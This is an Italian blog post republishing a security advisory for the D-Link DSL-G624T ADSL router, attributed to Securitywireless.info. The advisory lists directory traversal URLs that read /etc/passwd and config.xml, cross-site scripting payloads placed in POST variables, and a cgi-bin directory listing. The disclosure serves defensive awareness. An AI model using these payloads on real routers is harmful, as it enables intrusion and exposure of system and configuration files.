Wireless Italia il 1 Portale sul Wireless in Italia - Individuata vulnerabilita' D-Link DSL-G624T ADSL Router

Individuata vulnerabilita' D-Link DSL-G624T ADSL Router

Notizie flash

Texas Instruments Incorporated annuncia WiLink 5.0 mWLAN Solutions la nuova piattaforma di quinta generazione, da 80nanometri, in tecnologia DRP, che integrerà in un unico Chip una periferica WLAN in tecnologia 802.11a/b/g, Bluetooth, ed una radio FM. Questa nuova soluzione sarà disponibile ed operativa nel 2007, in vari package e supporterà sistemi operativi mobili come Symbian, Microsoft Windows Mobile, Linux, ed altri SO low level, per poter venire incluso in telefoni cellulari di ultima generazione. La tecnologia costruttiva adottata garantisce una riduzione dei consumi del 20% rispetto ad altri dispositivi di attuale generazione. Fra le funzioni più interessanti dichiarati da TI: VoWLAN functionality, optimized on TI's OMAP-Vox™ and WiLink solutions, UMA".

Menu principale

Home

Forum sul Wireless

Iscrizione Newsletter

Rimozione Newsletter

Wireless nei Comuni

Contributi Audio sul W.

Software per Wireless

Eventi e Manifestazioni

Normativa Wireless

Computers e Wireless

Sistemi Bluetooth

Comunicazioni dal sito

Glossario sul Wireless

Dicono di Noi

Press Kit

Audio Guestbook

Podcast
Full Feed

Individuata vulnerabilita' D-Link DSL-G624T ADSL Router

Segnaliamo una vulnerabilita' comunicataci da Luigi D'Amato admin di Securitywireless.info che riguarda i D-Link DSL-G624T

ADSL

Router (

Firmware Version : V3.00B01T01.YA-C.20060616). Quest'ultima e' stata riscontrata in una mancata validazione di alcuni input da parte del device. Un attaccante remoto sfruttando quest'errore puo' visualizzare file arbitrari presenti sul router o eseguire far eseguire codice scripting ad un utente.

Esempi:

Directory transversal
http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting
Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fstate
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: "+onmouseover="alert(20102006)

Directory listing
Is possible to list the /cgi-bin directory

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616

< Articolo Precedente		Prossimo Articolo >

[Indietro]

Tutti i contenuti di Wireless-Italia (blog amatoriale a scopo didattico) sono pubblicati secondo la licenza di utilizzo Creative Commons, salvo diverse indicazioni. Wireless-Italia non assume alcuna responsabilita' nel caso di errori contenuti negli articoli o di errori in cui fosse incorso nella loro riproduzione sul sito. Le pubblicazioni su Wireless-Italia NON costituiscono in alcun modo offerta o consiglio di acquisto e avvengono senza eventuali protezioni di brevetti d'invenzione; inoltre, i nomi coperti da eventuale marchio registrato vengono utilizzati senza tenerne conto. Wireless-Italia non presta garanzie di nessun tipo sull'idoneita' di tutti i propri servizi al raggiungimento di un qualsiasi scopo. Consigliamo per tanto di consultare le Note Legali e le informazioni sulla Privacy prima di accedere ai contenuti di Wireless-Italia. ATTENZIONE: Wireless-Italia NON vende prodotti o accessi wireless.

Visita anche www.savoldi.com

mercoledì 09 luglio 2008

Wireless-Italia